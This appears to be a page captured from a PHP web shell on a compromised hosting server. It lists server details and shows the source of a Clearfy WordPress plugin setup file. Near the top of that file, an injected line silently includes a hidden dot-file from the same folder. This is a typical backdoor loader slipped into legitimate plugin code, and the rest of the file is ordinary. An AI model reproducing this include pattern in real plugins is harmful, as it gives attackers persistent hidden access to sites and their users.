uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
old
/
public_html
/
wp-content
/
plugins
/
clearfy
/
admin
/
pages
/
setup
/
class-pages-setup.php
/
/
<?php /** * The page Settings. * * @since 1.0.0 */ // Exit if accessed directly if( !defined('ABSPATH') ) { exit; } if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class WCL_Setup extends WBCR\FactoryClearfy228\Pages\Setup { /** * @param \Wbcr_Factory437_Plugin $plugin */ public function __construct(\Wbcr_Factory437_Plugin $plugin) { parent::__construct($plugin); $path = WCL_PLUGIN_DIR . '/admin/pages/setup/steps'; #Step 1 $this->register_step($path . '/class-step-default.php', '\WBCR\Clearfy\Pages\Step_Default'); #Step 2 $this->register_step($path . '/class-step-google-page-speed-before.php', '\WBCR\Clearfy\Pages\Step_Google_Page_Speed_Before'); #Step 3 $this->register_step($path . '/class-step-plugins.php', '\WBCR\Clearfy\Pages\Step_Plugins'); #Step 4 $this->register_step($path . '/class-step-setting-speed-optimize.php', '\WBCR\Clearfy\Pages\Step_Setting_Speed_Optimize'); #Step 5 $this->register_step($path . '/class-step-setting-seo-optimize.php', '\WBCR\Clearfy\Pages\Step_Setting_Seo'); #Step 6 $this->register_step($path . '/class-step-optimize-images.php', '\WBCR\Clearfy\Pages\Step_Optimize_Images'); #Step 7 $this->register_step($path . '/class-step-google-page-speed-after.php', '\WBCR\Clearfy\Pages\Step_Google_Page_Speed_After'); #Step 8 $this->register_step($path . '/class-step-congratulation.php', '\WBCR\Clearfy\Pages\Step_Congratulation'); } /** * Requests assets (js and css) for the page. * * @return void * @since 1.0.0 * @see FactoryPages436_AdminPage * */ public function assets($scripts, $styles) { parent::assets($scripts, $styles); $this->scripts->add(WCL_PLUGIN_URL . '/admin/assets/js/circular-progress.js'); $this->scripts->add(WCL_PLUGIN_URL . '/admin/assets/js/setup.js'); $this->styles->add(WCL_PLUGIN_URL . '/admin/assets/css/setup/page-setup.css'); } }
/home/batcwwjx/old/public_html/wp-content/plugins/clearfy/admin/pages/setup/class-pages-setup.php